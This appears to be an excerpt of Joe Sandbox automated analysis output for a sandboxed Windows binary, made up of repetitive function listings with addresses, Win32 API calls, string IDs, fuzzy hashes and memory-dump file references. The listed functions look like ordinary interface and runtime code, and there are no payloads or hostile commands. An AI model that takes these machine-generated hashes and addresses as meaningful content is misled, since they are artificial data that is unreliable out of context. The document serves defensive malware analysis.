                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                                Function 0040F790 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                                • String ID: $6
                                                                                                                                                                                                                                                                                                • API String ID: 201260696-4183747533
                                                                                                                                                                                                                                                                                                • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                                Function 005044CB Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 005045EA
                                                                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 005046F8
                                                                                                                                                                                                                                                                                                • CatchIt.LIBVCRUNTIME ref: 00504749
                                                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0050484A
                                                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00504865
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                                                                                • Opcode ID: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 4c312c5944364cf67c01a2669073ec3c682224089c6a705f39cce00d7300e0bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5B19DB180020AEFCF14DFA4C8859AEBFB5FF45310F14855AEA156B292D331DA61CF91
                                                                                                                                                                                                                                                                                                Function 00409D40 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CopyRect
                                                                                                                                                                                                                                                                                                • String ID: Bottom$Left$Margin$Right$Top$`=$=
                                                                                                                                                                                                                                                                                                • API String ID: 1989077687-1885521073
                                                                                                                                                                                                                                                                                                • Opcode ID: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                                • Instruction ID: 7cbf7df4fec77659c91c3afac7ac99305081f53a3d300e0ff47080e44fb4b669
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EB166766043419FC310DF28C881B5BB7E8FB98704F148A2EF58A97391DB75E944CB9A
                                                                                                                                                                                                                                                                                                Function 00418660 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 282windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                                • String ID: %.2f%%$%I64u
                                                                                                                                                                                                                                                                                                • API String ID: 2245208738-2288124401
                                                                                                                                                                                                                                                                                                • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                                Function 00418A70 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 249windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00418B07
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00418BA8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000083FE,?,?), ref: 00418BF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 00418C9F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00418D51
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                                • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                                • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                                • Opcode ID: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                                • Instruction ID: 9e016845d88e4024dd1218f79a327356caeee79904b42a6c0a28c628b7da3379
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2691E0712047009BD710EF24DD85FDAB7E5BF98704F00092EF945AB286DB78E945CBAA
                                                                                                                                                                                                                                                                                                Function 0042CCB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 192windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000133D,00000000,00000001), ref: 0042CE5B
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,1088D068,?,?,?,?,?,?,?,?,?,004217B6), ref: 0042CEBD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042CEF4
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042CF49
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$RedrawWindow
                                                                                                                                                                                                                                                                                                • String ID: %s (%c:)$%s (%s)$3401034$3401126
                                                                                                                                                                                                                                                                                                • API String ID: 648961319-3732436656
                                                                                                                                                                                                                                                                                                • Opcode ID: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                                • Instruction ID: fd74af85edc4f78d52bbe53b36b76dc0b3b7e67d0ab5ffb778a9a62391dde0ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E718D716043409FD324DF64DD85FABBBF4EF88700F10492EFA5A96290DBB4A944CB5A
                                                                                                                                                                                                                                                                                                Function 00419AE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(00497F28), ref: 00419C49
                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(00497F30), ref: 00419C54
                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00419C70
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419C9C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
